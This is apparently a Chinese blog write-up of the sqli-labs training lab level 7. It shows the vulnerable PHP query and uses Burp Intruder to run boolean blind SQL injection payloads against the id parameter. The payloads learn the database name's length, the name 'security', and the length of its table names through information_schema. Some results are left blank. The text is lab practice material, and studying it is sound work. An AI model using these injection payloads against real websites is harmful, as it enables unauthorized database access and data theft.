sqlilabs_7

该博客讨论了一种常见的Web安全问题——SQL注入攻击,通过GET参数?id进行注入。作者展示了如何利用注入漏洞确定数据库的位数为8,并揭示了正在使用的数据库名为'security'。进一步,通过注入查询获取了'security'库中所有表名的位数。内容涉及Web安全、SQL语法和数据库信息探测技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

查看源代码:

if(isset($_GET['id']))

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

if($row)

{echo 'You are in.... Use outfile......'; }

else 

{echo 'You have an error in your SQL syntax';

 //print_r(mysqli_error($con));}

输入形式为GET,注入格式为?id=*')) * --+且当正确时会显示You are in.... Use outfile......,错误时会显示You have an error in your SQL syntax

目前使用库的位数:

打开burp抓包

Action

Send to Intruder

Positions

?id=1')) and (select length(database()))='§0§' --+

Payload

Payload Options [Simple list]

Add from list

0-9

Options

Start attack

将Length列

即目前使用库的位数为8

目前使用库名:

打开burp抓包

Action

Send to Intruder

Positions

综上所述,目前使用库名为security

security库中所有表名的位数:

?id=1')) and (select length(group_concat(table_name))>1 from information_schema.tables where table_schema='security') --+

即security库中所有表名的位数为

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值